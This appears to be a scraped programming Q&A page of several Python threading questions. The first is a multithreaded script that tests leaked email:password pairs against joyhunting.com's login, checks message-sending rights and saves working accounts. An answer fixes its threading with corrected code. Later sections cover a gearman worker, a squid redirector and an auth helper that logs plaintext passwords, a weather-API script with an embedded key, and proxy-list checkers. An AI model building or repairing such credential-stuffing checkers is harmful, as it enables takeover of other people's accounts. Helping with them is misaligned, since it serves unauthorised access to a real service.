python thread queue question

Hello all.
I wrote a Python script that uses threads to check whether certain accounts exist on a website.
With a single thread it works fine, but when I increase the thread count to 3~5 or more,
the results differ from the single-threaded run. I checked them manually, and
the multi-threaded results are not correct.
I think my threading code needs tuning, or should I use the Queue module?
Can anyone advise on or tune my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys, os
import re
import threading, time
import urllib
import cookielib
import mechanize
from BeautifulSoup import BeautifulSoup, BeautifulStoneSoup, Tag

# Maximum number of threads to run at any one time.
MAX_PROCS = 5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread(threading.Thread):
    llemail = ""
    llpassword = ""

    def __init__(self, lemail, lpassword):
        self.llemail = lemail
        self.llpassword = lpassword
        threading.Thread.__init__(self)

    def run(self):
        valid = []
        llemail = self.llemail
        llpassword = self.llpassword
        try:
            params = urllib.urlencode({'userid': llemail, 'passwd': llpassword})
            rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
            rs = mechanize.urlopen(rq)
            data = rs.read()
            logged_in = r'var _id' in data  # logged in successfully
            if logged_in:
                rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
                rs = mechanize.urlopen(rq)
                maindata = rs.read(50024)
                jun_member = r"준회원"
                save = open(SAVEFILE, 'a')
                for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
                    matched = match.group(1)
                for match2 in re.finditer(r"var _gd(.*?);", data):
                    matched2 = match2.group(1)
                    print '%s, %s' % (matched, matched2)
                    break
                rq1 = mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid=" + llemail + "&ToID=undefined&hide=undefined")
                rs1 = mechanize.urlopen(rq1)
                sendmsg = rs1.read()
                #print sendmsg
                match3 = ''
                for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
                    matched3 = match3.group(1)
                    #print matched3
                    print 'bad'
                    break
                if match3 == '':
                    save.write('%s, %s, %s:%s\n' % (matched, matched2, llemail, llpassword))
                    save.close()
                    print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
                else:
                    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
                return 0
        except:
            print '[!] Exception checking %s.' % (llemail)
            return 1
        return 0

try:
    listhandle = open(maillist)
# Bail out if the file doesn't exist
except:
    print '[!] %s does not exist. Please create the file!' % (maillist)
    exit(2)

# Loop through the file
for line in listhandle:
    # Parse the line
    try:
        details = line.split(':')
        email = details[0]
        password = details[1].replace('\n', '')
    # Throw an error and exit.
    except:
        print '[!] Parse error in %s on line: %s' % (maillist, line)
        exit(2)
    if len(threads) < MAX_PROCS:
        # Start another worker thread
        print '[ ] Starting thread to check account %s.' % (email)
        thread = CheckMyThread(email, password)
        thread.start()
        threads.append(thread)
    else:
        # Wait for a thread to exit.
        gonext = 0
        while 1 == 1:
            i = 0
            #print '[ ] Checking for a thread to exit...'
            while i < len(threads):
                #print '[ ] %d' % (i)
                try:
                    if threads[i]:
                        if not threads[i].isAlive():
                            #print '[-] Thread %d is dead' % (i)
                            threads.pop(i)
                            print '[ ] Starting thread to check account %s.' % (email)
                            thread = CheckMyThread(email, password)
                            thread.start()
                            threads.append(thread)
                            gonext = 1
                            break
                        else:
                            #print '[+] Thread %d is still running' % (i)
                            pass
                    else:
                        print '[ ] Crap.'
                except NameError:
                    print '[ ] AWWW COME ON!!!!'
                i = i + 1
            time.sleep(0.050)
            if gonext:
                break

Can you specify how the results actually differ?
From what I can see, the code is doing much more than just verifying accounts.
You're also appending to a single file from multiple threads, which is not thread-safe.
Also, AFAIK mechanize uses shared cookie storage for all requests, so the threads are probably interfering with each other. Use a separate mechanize.Browser() inside run() instead of mechanize.Request().
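For example, here is a minimal sketch of run() using a per-thread Browser plus a lock around the file writes; the login URL and form fields are copied from your script, and the rest of your checks are omitted:
import threading
import urllib
import cookielib
import mechanize

save_lock = threading.Lock()          # shared by all checker threads
SAVEFILE = 'valid_joyhunt.txt'

class CheckMyThread(threading.Thread):
    def __init__(self, email, password):
        threading.Thread.__init__(self)
        self.email = email
        self.password = password

    def run(self):
        # One Browser (and cookie jar) per thread, so logins cannot interfere.
        br = mechanize.Browser()
        br.set_cookiejar(cookielib.CookieJar())
        params = urllib.urlencode({'userid': self.email, 'passwd': self.password})
        data = br.open("http://www.joyhunting.com/include/member/login_ok1.asp",
                       params).read()
        if r'var _id' in data:
            # Only one thread at a time may append to the shared result file.
            with save_lock:
                out = open(SAVEFILE, 'a')
                out.write('%s:%s\n' % (self.email, self.password))
                out.close()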

Related

Keep gearman worker in listening mode after loading file content

I want to keep some file content loaded in memory so that it can be queried and retrieved instantly.
In the gearman worker, I load the file and put the worker into listening mode. When I make a request with the gearman client, the worker returns the loaded content only once; the next time, the client receives None.
worker:
import sys
import json
import traceback
from collections import defaultdict

import gearman

class GetLexiconFiles(object):
    def __init__(self):
        self.gm_worker = gearman.GearmanWorker(['localhost:4730'])
        self.loadFiles()
        self.gm_worker.register_task('load_db', self.task_listener_reverse)
        #self.loadFiles()
        #self.gm_worker.work()

    def task_listener_reverse(self, gearman_worker, gearman_job):
        k = float('inf')
        #print "Started loading file"
        self.input_text = self.input_text.split('\n')
        print "Loading completed"
        lexicon = defaultdict(list)
        for i, line in enumerate(self.input_text):
            #print "line is : ", line
            if i >= k: break
            #if i % 100000 == 0: print >>sys.stderr, i
            try:
                if line != '':
                    nl, dbs = line.split(' ', 1)
                    nl = int(nl)
                    dbs = self.str2obj(dbs)
                    lexicon[nl].append(dbs)
                else:
                    pass
            except:
                print >>sys.stderr, 'could not parse line %r' % line
                print traceback.format_exc()
                continue
        return json.dumps(lexicon)

if __name__ == '__main__':
    GetLexiconFiles().gm_worker.work()
client:
def check_request_status(job_request):
    if job_request.complete:
        #data = json.loads(job_request.result)
        print "Job %s finished! Result: %s - %s" % (job_request.job.unique, job_request.state, job_request.result)
    elif job_request.timed_out:
        print "Job %s timed out!"
    elif job_request.state == JOB_UNKNOWN:
        print "Job %s connection failed!"

gm_client = gearman.GearmanClient(['localhost:4730'])
tasks = [{'task': 'load_lexicon', 'data': 'This is testing sentence'}, {'task': 'load_db', 'data': 'This is db testing'}]
submitted_requests = gm_client.submit_multiple_jobs(tasks, background=False, wait_until_complete=False)
completed_requests = gm_client.wait_until_jobs_completed(submitted_requests)
print completed_requests[1].result
for completed_job_request in completed_requests:
    check_request_status(completed_job_request)
self.input_text = self.input_text.split('\n')
With this line of code you are converting a string into a list of strings.
Since you save the result back into self.input_text, the next time the function is called self.input_text will already be a list, and calling split on it will raise an exception.
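A minimal fix along those lines (reusing the names from the question: input_text, str2obj, defaultdict, json) is to split into a local list instead of overwriting self.input_text:
def task_listener_reverse(self, gearman_worker, gearman_job):
    lexicon = defaultdict(list)
    # Work on a local list; self.input_text stays a string between jobs.
    for line in self.input_text.split('\n'):
        if not line:
            continue
        try:
            nl, dbs = line.split(' ', 1)
            lexicon[int(nl)].append(self.str2obj(dbs))
        except Exception:
            print >>sys.stderr, 'could not parse line %r' % line
    return json.dumps(lexicon)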

Broken Pipe Error on python script with squid

I am running a simple Python script to log the accessed URL using squid's url_rewriter_program.
However, every time it runs, the rewriter crashes with a broken-pipe error at sys.stdout.flush().
Please suggest a specific solution.
The Python code is:
import sys
import os
import io
line = sys.stdin.readline()
fo=open("/home/linux/Desktop/foo1.txt","a")
fo.write(line)
fo.close()
sys.stdout.write("\n")
sys.stdout.flush()
This is a squid redirector, written in Python; you can compare it with your script:
Redirector:
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
#-----------------------------------------------------------------------------
# Name: redirector_master.py
# Purpose: SiSCont checker cuote
#
# Author: Ernesto Licea Martin
#
# Created: 2011/11/24
# RCS-ID: $Id: redirector_master.py $
# Copyright: (c) 2011
# Licence: GPL
#-----------------------------------------------------------------------------
import sys, string, libSiSCont
__name__= "redirector_master"
query="SELECT accounts_proxyquotatype.name, accounts_proxyaccount.proxy_quota, accounts_proxyaccount.proxy_quota_extra, accounts_proxyaccount.proxy_active, accounts_proxyaccounttype.name FROM accounts_proxyaccount INNER JOIN accounts_proxyaccounttype INNER JOIN accounts_proxyquotatype ON (accounts_proxyaccount.proxy_quota_type_id = accounts_proxyquotatype.id) AND (accounts_proxyaccount.proxy_account_type_id = accounts_proxyaccounttype.id) WHERE accounts_proxyaccount.proxy_username=%s"
class RedirMaster:
def __init__(self):
obj = libSiSCont.ParceConf()
obj.parcecfgfile()
self.__listModules = obj.getModList()
self.__redirDicc = obj.getRedirectURL()
self.__penalURL = obj.getPenalizedURL()
self.__confDicc = obj.getConfParam()
self.__dbDicc = obj.getDBDicc()
self.__proxyDicc = obj.getProxyCacheParam()
self.__dbParam = []
def getProxyTypes(self):
db=libSiSCont.connectDB(dbDicc=self.__dbDicc)
c=db.cursor()
c.execute("SELECT accounts_proxy")
def run(self):
modules=[]
for mod in self.__listModules:
try:
m=__import__(mod)
modules.append(m)
except Exception, e:
libSiSCont.reportLogs("%s.run" %__name__, 'Unable to load redirector module %s; the error was: %s' % (mod,str(e)))
if len(modules) == 0:
libSiSCont.reportLogs("%s.run" %__name__, 'No usable redirector module found; switching to trasparent behavour')
while 1:
try:
data_redir=raw_input()
data_redir=data_redir.split()
url,ip_host,user,method,urlgroup = data_redir[0:5]
ip=ip_host.split("/")[0]
host_name=ip_host.split("/")[1]
uri = url
mode=""
#Don't check cache access
if string.find(url,"cache_object") == 0:
sys.stdout.write("%s%s\n" %(mode,uri))
sys.stdout.flush()
continue
db=libSiSCont.connectDB(dbDicc=self.__dbDicc)
c=db.cursor()
c.execute(query,user)
cuote_type,cuote, ext_cuote, active, acc_type = c.fetchall()[0]
self.__dbParam=[cuote_type,int(cuote), int(ext_cuote), active, acc_type]
for module in modules:
try:
uri = module.redir(url = url, ip = ip, host_name = host_name, user = user, method = method, urlgroup = urlgroup, redirDicc = self.__redirDicc, penalURL = self.__penalURL, confDicc = self.__confDicc, proxyDicc = self.__proxyDicc, dbParam = self.__dbParam)
except Exception, e:
libSiSCont.reportLogs("%s.run" %__name__, 'Error while running module: %s -- The error was: %s' % (module,str(e)))
if uri != url:
mode = "301:"
break
sys.stdout.write("%s%s\n" %(mode,uri))
sys.stdout.flush()
except Exception, e:
if not string.find('%s' % e,'EOF') >= 0:
sys.stdout.write('%s\n' % uri)
sys.stdout.flush()
libSiSCont.reportLogs("%s.run" %__name__, '%s: data received from parent: %s' % (str(e),string.join(data_redir)))
else:
sys.exit()
obj=RedirMaster()
obj.run()
Helper:
#!/usr/bin/env python
import sys, syslog, libSiSCont, string, crypt

__name__ = "Helper"

query = "SELECT accounts_proxyaccount.proxy_username FROM accounts_proxyaccount WHERE accounts_proxyaccount.proxy_username=%s AND accounts_proxyaccount.proxy_password=%s"

class BasicAuth:
    def __init__(self):
        obj = libSiSCont.ParceConf()
        obj.parcecfgfile()
        self.__dbDicc = obj.getDBDicc()

    def run(self):
        while 1:
            try:
                user_pass = string.split(raw_input())
                user = user_pass[0].strip("\n")
                passwd = user_pass[1].strip("\n")
                crypt_passwd = crypt.crypt(passwd, user)
                db = libSiSCont.connectDB(self.__dbDicc)
                c = db.cursor()
                c.execute(query, (user, crypt_passwd))
                if c.fetchone() == None:
                    libSiSCont.reportLogs('%s.run' % __name__, 'User Authentication Fail, user = %s password= %s, Access Denied' % (user, passwd))
                    sys.stdout.write("ERR\n")
                    sys.stdout.flush()
                else:
                    libSiSCont.reportLogs('%s.run' % __name__, 'User Authentication Success, user = %s, Access Granted' % user)
                    sys.stdout.write("OK\n")
                    sys.stdout.flush()
            except Exception, e:
                if not string.find("%s" % e, "EOF") >= 0:
                    sys.stdout.write("ERR\n")
                    sys.stdout.flush()
                    libSiSCont.reportLogs('%s.run' % __name__, 'Authenticator error, user will navigate without authentication: %s' % str(e))
                else:
                    sys.exit()

obj = BasicAuth()
obj.run()
I hope this helps ;-)
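For comparison, here is a minimal sketch of the question's logging script restructured into the same read-loop shape, assuming squid feeds the rewriter one request line at a time and expects one reply line (here just the unchanged URL) per request:
#!/usr/bin/env python
import sys

log = open("/home/linux/Desktop/foo1.txt", "a")  # path taken from the question
while True:
    line = sys.stdin.readline()
    if not line:                  # EOF: squid closed the pipe, exit quietly
        break
    log.write(line)
    log.flush()
    fields = line.split()
    url = fields[0] if fields else ''
    sys.stdout.write(url + "\n")  # echo the URL back unchanged
    sys.stdout.flush()
log.close()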

python calling apis events and printing randomly

I have an interval of 60 and want to print 6 events every minute, but it prints 11, 12, or 13 events, seemingly at random, each minute. Why is that? Is it caused by my code, or could other factors cause this?
My code is:
import logging
import httplib
import simplejson as json
import socket
import time
import datetime
import urllib2
import sys
import xml.dom.minidom
from bs4 import BeautifulSoup as soup

SCHEME = """<scheme>
    <title>testingCurrentWeatherSG</title>
    <description>Get data from forecast.</description>
    <use_external_validation>true</use_external_validation>
    <streaming_mode>simple</streaming_mode>
    <endpoint>
        <args>
            <arg name="intervalone">
                <title>Intervalone</title>
                <description>How long to refresh this query?</description>
            </arg>
        </args>
    </endpoint>
</scheme>
"""

def do_scheme():
    print SCHEME

## Utility functions
def fahrenheit(fahren):
    return (fahren - 32) * 5.0 / 9.0

def get_percent(num):
    return num * 100.

## Responses
def get_response(conn, url):
    try:
        conn.request('GET', url)
        result = conn.getresponse()
        data = result.read()
        return json.loads(data)
    except socket.timeout:
        return None

## Printing
def print_forecast(name, di):
    # Print the forecast from 'di', for location 'name'
    # name is the name of the location, di is the api response
    psi_avg = 20
    current = di['currently']
    for key, value in sorted(current.iteritems()):
        if key in ['cloudCover', 'icon', 'ozone', 'precipIntensity',  # time
                   'precipProbability', 'precipType', 'pressure', 'summary',
                   'visibility', 'windBearing', 'windSpeed']:
            print '{0} : {1}'.format(key, value)
        elif key in ['temperature', 'dewPoint']:
            print '%s: %.2f' % (key, fahrenheit(value))
        elif key == 'humidity':
            print '%s: %.2f' % (key, get_percent(value))
    print 'psiAverage : ' + str(psi_avg)
    print 'latitude : ' + str(di['latitude'])
    print 'longitude : ' + str(di['longitude'])
    print 'location : ' + str(name)
    print

def weather_Connection(intervalone):
    host = 'api.forecast.io'
    conn = httplib.HTTPSConnection(host, timeout=60)  # adjust timeout as desired
    try:
        urlnyp = '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.37871,103.848808'
        conn.request('GET', urlnyp)
        resultnyp = conn.getresponse()
        contentnyp = resultnyp.read()
    except socket.timeout:
        print 'socket timeout'
        return
    # the locations and urls for the api calls
    urls = {
        'Choa Chu Kang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.394557,103.746396',
        'Kallang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.311469,103.871399',
        'Jurong West': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.352008,103.698599',
        'Redhill': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.289732,103.81675',
        'Tampines': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.353092,103.945229',
        'Yishun': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.429463,103.84022',
    }
    responses = {}
    for i, (name, url) in enumerate(sorted(urls.iteritems())):
        response = get_response(conn, url)
        if not response:
            print 'socket timeout on url#%d: %s' % (i, url)
            return
        responses[name] = response
    conn.close()
    # print the forecast
    for name, data in responses.iteritems():
        print_forecast(name, data)

def get_config():
    # Read XML configuration data passed from splunkd on stdin
    config = {}
    try:
        # read everything from stdin
        config_str = sys.stdin.read()
        # parse the config XML
        doc = xml.dom.minidom.parseString(config_str)
        root = doc.documentElement
        conf_node = root.getElementsByTagName("configuration")[0]
        if conf_node:
            logging.debug("XML: found configuration")
            stanza = conf_node.getElementsByTagName("stanza")[0]
            if stanza:
                stanza_name = stanza.getAttribute("name")
                if stanza_name:
                    logging.debug("XML: found stanza " + stanza_name)
                    config["name"] = stanza_name
                    params = stanza.getElementsByTagName("param")
                    for param in params:
                        param_name = param.getAttribute("name")
                        logging.debug("XML: found param '%s'" % param_name)
                        if param_name and param.firstChild and \
                           param.firstChild.nodeType == param.firstChild.TEXT_NODE:
                            data = param.firstChild.data
                            config[param_name] = data
                            logging.debug("XML: '%s' -> '%s'" % (param_name, data))
        if not config:
            raise Exception, "Invalid configuration received from Splunk."
    except Exception, e:
        raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
    return config

def run():
    # The main function that starts the action. The thread will sleep for
    # however many seconds are configured via the Input.
    # config = get_config()
    # intervalone = config["intervalone"]
    intervalone = 60
    while True:
        weather_Connection(intervalone)
        logging.info("Sleeping for %s seconds" % (intervalone))
        time.sleep(float(intervalone))

if __name__ == '__main__':
    if len(sys.argv) > 1:
        if sys.argv[1] == "--scheme":
            do_scheme()
    else:
        run()
    sys.exit(0)
I've checked and tried your code and it works fine. Try replacing
logging.info("Sleeping for %s seconds" %(intervalone))
with
print("Sleeping for %s seconds" % (intervalone))
You should see this statement every 6 forecasts.
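If you would rather keep logging.info(), another option (not shown in the original script) is to raise the root logger's verbosity, since by default it only emits WARNING and above:
import logging

# Without this, logging.info(...) is silently dropped (default level is WARNING).
logging.basicConfig(level=logging.INFO)
logging.info("Sleeping for %s seconds" % 60)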
Note: why return from weather_Connection() here?
for i, (name, url) in enumerate(sorted(urls.iteritems())):
    response = get_response(conn, url)
    if not response:
        print 'socket timeout on url#%d: %s' % (i, url)
        return
    responses[name] = response
You can just skip the failed URL with continue:
for i, (name, url) in enumerate(sorted(urls.iteritems())):
    response = get_response(conn, url)
    if not response:
        print 'socket timeout on url#%d: %s' % (i, url)
        continue
    responses[name] = response

python proxy list check

I have a text file that contains proxy IPs, which looks like the following:
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
After checking these proxies, I want to mark them as follows:
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
How can this be done with Python? Is there a sample?
If anyone can help or enlighten me, it would be much appreciated!
Edit:
This is the script source I have so far.
The finished check results are saved to 'proxy_alive.txt';
in this file I want to mark whether each proxy is alive or not.
import socket
import urllib2
import threading
import sys
import Queue

socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout" % (socket.getdefaulttimeout())

#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com"  # Don't put http:// in here, or any /'s

check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20

def writer(f, rq):
    while True:
        line = rq.get()
        f.write(line + '\n')

def checker(q, oq):
    while True:
        proxy_info = q.get()  # ip:port
        if proxy_info == None:
            print "Finished"
            #quit()
            return
        #print "Checking %s" % proxy_info
        if proxy_type == 'http':
            try:
                listhandle = open("proxylist.txt").read().split('\n')
                for line in listhandle:
                    saveAlive = open("proxy_alive.txt", 'a')
                    details = line.split(':')
                    email = details[0]
                    password = details[1].replace('\n', '')
                    proxy_handler = urllib2.ProxyHandler({'http': proxy_info})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    urllib2.install_opener(opener)
                    req = urllib2.Request("http://www.google.com")
                    sock = urllib2.urlopen(req, timeout=7)
                    rs = sock.read(1000)
                    if '<title>Google</title>' in rs:
                        oq.put(proxy_info)
                        print '[+] alive proxy', proxy_info
                        saveAlive.write(line)
                    saveAlive.close()
            except urllib2.HTTPError, e:
                print 'url open error? slow?'
                pass
            except Exception, detail:
                print '[-] bad proxy', proxy_info
        else:
            # gotta be socks
            try:
                s = socks.socksocket()
                if proxy_type == "s4":
                    t = socks.PROXY_TYPE_SOCKS4
                else:
                    t = socks.PROXY_TYPE_SOCKS5
                ip, port = proxy_info.split(':')
                s.setproxy(t, ip, int(port))
                s.connect((url, 80))
                oq.put(proxy_info)
                print proxy_info
            except Exception, error:
                print proxy_info

threading.Thread(target=writer, args=(open(output_file, "wb"), output_queue)).start()
for i in xrange(threads):
    threading.Thread(target=checker, args=(check_queue, output_queue)).start()
for line in open(input_file).readlines():
    check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
    check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)
Is this what you want?
#!/usr/bin/env python
import Queue
import threading
import urllib2
import time

input_file = 'proxylist.txt'
threads = 10
queue = Queue.Queue()
output = []

class ThreadUrl(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            # grabs host from queue
            proxy_info = self.queue.get()
            try:
                proxy_handler = urllib2.ProxyHandler({'http': proxy_info})
                opener = urllib2.build_opener(proxy_handler)
                opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                urllib2.install_opener(opener)
                req = urllib2.Request("http://www.google.com")
                sock = urllib2.urlopen(req, timeout=7)
                rs = sock.read(1000)
                if '<title>Google</title>' in rs:
                    output.append(('0', proxy_info))
                else:
                    raise Exception("Not Google")
            except:
                output.append(('x', proxy_info))
            # signals to queue job is done
            self.queue.task_done()

start = time.time()

def main():
    # spawn a pool of threads, and pass them queue instance
    for i in range(5):
        t = ThreadUrl(queue)
        t.setDaemon(True)
        t.start()
    hosts = [host.strip() for host in open(input_file).readlines()]
    # populate queue with data
    for host in hosts:
        queue.put(host)
    # wait on the queue until everything has been processed
    queue.join()

main()
for proxy, host in output:
    print proxy, host
print "Elapsed Time: %s" % (time.time() - start)

text file processing with python

This question repeats the "python proxy list check" question above: the same proxy list in ip:port form, the same desired output (each proxy marked alive '0' or dead 'x', plus totals and percentages), and the same checker script that saves live proxies to 'proxy_alive.txt'.
You can use a queue to hold the list of addresses and their meta information.
After you have finished your checks on these IP addresses, you can write the results back to the same file in 'w' mode, e.g. as a list of tuples:
[ (ip-address-1, 'x'), (ip-address-2, '0'), ... ]
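A rough sketch of that approach, assuming the question's proxylist.txt and proxy_alive.txt file names and a placeholder check() in place of the real proxy test:
import Queue
import threading

result_queue = Queue.Queue()

def check(address):
    # Placeholder: the real test would go through the proxy, as in the
    # question's script, and return '0' (alive) or 'x' (dead).
    return '0'

def worker(addresses):
    for address in addresses:
        result_queue.put((check(address), address))

addresses = [line.strip() for line in open('proxylist.txt') if line.strip()]
t = threading.Thread(target=worker, args=(addresses,))
t.start()
t.join()

results = []
while not result_queue.empty():
    results.append(result_queue.get())

with open('proxy_alive.txt', 'w') as f:
    for mark, address in results:
        f.write('%s %s\n' % (mark, address))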
